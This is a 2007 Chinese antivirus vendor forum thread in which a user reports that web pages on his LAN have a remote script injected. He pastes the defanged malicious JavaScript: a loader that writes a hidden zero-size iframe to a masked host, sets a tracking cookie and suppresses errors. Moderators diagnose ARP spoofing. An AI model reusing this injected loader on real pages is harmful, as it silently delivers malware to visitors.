» 游客:  注册 | 登录 | 帮助  微点交流论坛 » 预升级反馈专区 » 开微点仍然被加入代码，疑似病毒   作者: 标题: 开微点仍然被加入代码，疑似病毒 sonic_yq 新手上路 积分 22 发帖 22 注册 2007-5-29 #1  开微点仍然被加入代码，疑似病毒 微点版本： 微点主动防御软件  预升级 程序版本： 1.2.10571.0061 特征版本： 1.6.412.070818 更新时间： 2007-08-18 22:36:38 操作系统版本：win XP (5.1 2600) 网络环境：局域网，固定ip 状况：每个网页头均加入<script src=http冒号//***.com/n.js></script>脚本。 ie，firefox均如此 脚本内容如下： document.writeln("<script src=\"script src=\"http冒号\/***.com\/s368\/NEwJs2.js\"><\/script>"); document.*writeln("<script>"); document.*writeln("function oK_KaiShi(){"); document.*writeln("var Then = new Date() "); document.*writeln("Then.setTime(Then.getTime() + 24*60*60*1000)"); document.*writeln("var cookieString = new String(document.cookie)"); document.*writeln("var cookieHeader = \"Cookie1=\" "); document.*writeln("var beginPosition = cookieString.indexOf(cookieHeader)"); document.*writeln("if (beginPosition != -1){ "); document.*writeln("} else "); document.*writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() "); document.writeln("document.write(\'<iframe width=0 height=0 src=\"http:***.com***.htm\"><\/iframe>\');"); document.*writeln("}"); document.*writeln("}"); document.*writeln("oK_KaiShi();"); document.*writeln("<\/script>"); document.*writeln("<script>window.onerror=function(){return true;}<\/script>") 水平有限无法进一步分析病毒样本 但是每个页面都被加入脚本感觉有异常，请求帮助 知道您的意思，是怕网友误点连接，我修改了一下，这样应该没问题了，想研究的高手可以把“冒号”二字换成“:” [ Last edited by Legend on 2007-8-20 at 11:49 ] ※ ※ ※ 本文纯属【sonic_yq】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2007-8-20 10:39 Legend 超级版主 超级版主 积分 77171 发帖 70170 注册 2005-10-29 #2   请问楼主的情况是您在访问网页时，查看源代码发现被加入脚本还是您本机上存的网页文件被加入脚本？ 如果确认您是在使用ie、firefox访问网页时发生的，请查看您的局域网中是否其他机器访问网页也是这种情况。 推荐您使用微点主动防御软件的绑定mac地址功能，绑定您的网关mac地址。 ※文章所有权归【Legend】与【东方微点论坛】共同所有，转载请注明出处！※ 微点官方认证新浪微博：欢迎进入 微点新浪微博 微点技术支持邮箱: support@micropoint.com.cn 给Legend发短消息 2007-8-20 10:54 sonic_yq 新手上路 积分 22 发帖 22 注册 2007-5-29 #3     Quote: Originally posted by Legend at 2007-8-20 10:54: 请问楼主的情况是您在访问网页时，查看源代码发现被加入脚本还是您本机上存的网页文件被加入脚本？ 如果确认您是在使用ie、firefox访问网页时发生的，请查看您的局域网中是否其他机器访问网页也是这种情况。 推 ... 1 是在访问网页时发现有不明网站的加载，然后查看源代码发现的，不是本机网页或者缓存。 2 本身是从来不用ie的，发现firefox竟然有这种情况，询问了一下周围同事(ie 用户)，询问的二人都有这个情况。他们的监控分别是小红伞C版，金山（对金山不了解，具体版本不知道） 3 不是每个页面都有这个情况，比如微点论坛就没有这段代码。百度(www.baidu.com),校内网(www.xiaonei.com),Rootkit中国论坛(www.rootkitcn.com),等等网页均有此现象，某些伴随页面乱码 因为正在上班，没访问太多页面测试 4 考虑到有可能是arp病毒等，我绑定mac试一下，回头报告情况。请问现在这个情况有没有已经中毒的可能？需不需要再做些什么？小红伞大蜘蛛都升级最新查过了，均未发现病毒。 [ Last edited by sonic_yq on 2007-8-20 at 11:10 ] ※ ※ ※ 本文纯属【sonic_yq】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2007-8-20 11:04 Legend 超级版主 超级版主 积分 77171 发帖 70170 注册 2005-10-29 #4   您上传的脚本源代码已经被屏蔽，请勿在论坛里面贴出此类源代码，下次请发到support@micropoint.com.cn. 根据您提交的情况分析，可能您的局域网中存在arp欺骗行为，推荐您使用微点主动防御软件的绑定mac地址功能，绑定您的网关真实mac地址，并请联系您的网络管理人员，反馈您的情况，查找到具体arp欺骗的主机进行查杀处理。 您的本机可以使用微点软件的可疑程序诊断功能，诊断是否存在可疑程序。 ※文章所有权归【Legend】与【东方微点论坛】共同所有，转载请注明出处！※ 微点官方认证新浪微博：欢迎进入 微点新浪微博 微点技术支持邮箱: support@micropoint.com.cn 给Legend发短消息 2007-8-20 11:14 fwind 中级用户 积分 438 发帖 436 注册 2006-8-2 #5   楼主的接入网络中存在arp攻击。 ※ ※ ※ 本文纯属【fwind】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2007-8-20 11:14 Legend 超级版主 超级版主 积分 77171 发帖 70170 注册 2005-10-29 #6   由于楼主长时间未提供信息，我们暂时将该主题做锁帖处理，如有新的问题，请另开新帖与我们联系。 ※文章所有权归【Legend】与【东方微点论坛】共同所有，转载请注明出处！※ 微点官方认证新浪微博：欢迎进入 微点新浪微博 微点技术支持邮箱: support@micropoint.com.cn 给Legend发短消息 2007-8-22 17:19 论坛跳转: 微点软件公测区 安全快报  > 病毒快报  > 漏洞快报 微点产品在线技术支持  > 微点主动防御软件  > 预升级反馈专区  > 微点杀毒软件 微点用户交流区  > 微点新闻  > 微点软件使用交流  > 微点茶室 安全技术交流区  > 主动防御  > 反病毒  > 防火墙 综合区  > 电脑&数码  > 体育&娱乐&休闲  > 灌水区 版务管理 内部使用专区  可打印版本 | 推荐 | 订阅 | 收藏 [ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司 闽ICP备05030815号